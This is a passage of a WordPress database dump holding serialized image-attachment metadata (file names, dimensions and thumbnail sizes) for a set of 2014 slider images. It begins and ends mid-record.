idth\";i:300;s:6:\"height\";i:185;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"i61-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"i61-768x475.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:475;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"i61-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:16:\"i61-1000x500.jpg\";s:5:\"width\";i:1000;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:15:\"i61-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:15:\"i61-880x544.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:544;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:15:\"i61-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:15:\"i61-450x278.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:278;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:15:\"i61-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(194,542,'_wp_attached_file','2014/07/slide13.jpg'),(195,542,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1180;s:4:\"file\";s:19:\"2014/07/slide13.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"slide13-300x184.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"slide13-1024x629.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:629;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"slide13-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"slide13-768x472.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:472;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:20:\"slide13-1536x944.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:944;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"slide13-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:21:\"slide13-1670x1026.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:1026;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:20:\"slide13-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:19:\"slide13-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:19:\"slide13-880x541.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:541;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:19:\"slide13-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:19:\"slide13-450x277.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:277;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:19:\"slide13-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(196,543,'_wp_attached_file','2014/07/slide21.jpg'),(197,543,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:4:\"file\";s:19:\"2014/07/slide21.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"slide21-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"slide21-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"slide21-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"slide21-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:20:\"slide21-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"slide21-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:20:\"slide21-1670x939.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:939;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:20:\"slide21-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:19:\"slide21-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:19:\"slide21-880x495.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:495;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:19:\"slide21-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:19:\"slide21-450x253.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:253;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:19:\"slide21-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(198,544,'_wp_attached_file','2014/07/slide31.jpg'),(199,544,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:4:\"file\";s:19:\"2014/07/slide31.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"slide31-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"slide31-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"slide31-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"slide31-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:20:\"slide31-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"slide31-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:20:\"slide31-1670x939.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:939;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:20:\"slide31-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:19:\"slide31-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:19:\"slide31-880x495.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:495;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:19:\"slide31-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:19:\"slide31-450x253.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:253;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:19:\"slide31-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(200,545,'_wp_attached_file','2014/07/slide41.jpg'),(201,545,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1083;s:4:\"file\";s:19:\"2014/07/slide41.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"slide41-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"slide41-1024x578.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"slide41-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"slide41-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:20:\"slide41-1536x866.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:866;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"slide41-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:20:\"slide41-1670x942.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:942;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:20:\"slide41-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:19:\"slide41-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:19:\"slide41-880x496.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:496;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:19:\"slide41-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:19:\"slide41-450x254.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:254;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:19:\"slide41-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(202,546,'_wp_attached_file','2014/07/slide51.jpg'),(203,546,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1162;s:4:\"file\";s:19:\"2014/07/slide51.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"slide51-300x182.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"slide51-1024x620.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:620;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"slide51-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"slide51-768x465.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:465;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:20:\"slide51-1536x930.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:930;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"slide51-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:21:\"slide51-1670x1011.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:1011;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:20:\"slide51-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:19:\"slide51-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:19:\"slide51-880x533.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:533;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:19:\"slide51-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:19:\"slide51-450x272.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:19:\"slide51-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(204,547,'_wp_attached_file','2014/07/slide61.jpg'),(205,547,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1162;s:4:\"file\";s:19:\"2014/07/slide61.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"slide61-300x182.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"slide61-1024x620.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:620;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"slide61-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"slide61-768x465.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:465;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:20:\"slide61-1536x930.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:930;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"slide61-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:21:\"slide61-1670x1011.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:1011;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:20:\"slide61-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:19:\"slide61-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:19:\"slide61-880x533.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:533;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:19:\"slide61-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:19:\"slide61-450x272.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:19:\"slide61-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(206,548,'_wp_attached_file','2014/07/slide71.jpg'),(207,548,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1060;s:4:\"file\";s:19:\"2014/07/slide71.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"slide71-300x166.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"slide71-1024x565.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:565;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"slide71-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"slide71-768x424.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:424;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:20:\"slide71-1536x848.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:848;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"slide71-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:20:\"slide71-1670x922.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:922;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:20:\"slide71-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:19:\"slide71-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:19:\"slide71-880x486.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:19:\"slide71-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:19:\"slide71-450x248.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:248;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:19:\"slide71-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(208,549,'_wp_attached_file','2014/07/slide81.jpg'),(209,549,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1060;s:4:\"file\";s:19:\"2014/07/slide81.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"slide81-300x166.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"slide81-1024x565.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:565;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"slide81-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"slide81-768x424.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:424;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:20:\"slide81-1536x848.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:848;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"slide81-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:20:\"slide81-1670x922.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:922;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:20:\"slide81-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:19:\"slide81-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:19:\"slide81-880x486.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:19:\"slide81-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:19:\"slide81-450x248.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:248;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:19:\"slide81-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(210,550,'_wp_attached_file','2014/07/slide91.jpg'),(211,550,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1060;s:4:\"file\";s:19:\"2014/07/slide91.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"slide91-300x166.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"slide91-1024x565.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:565;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"slide91-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;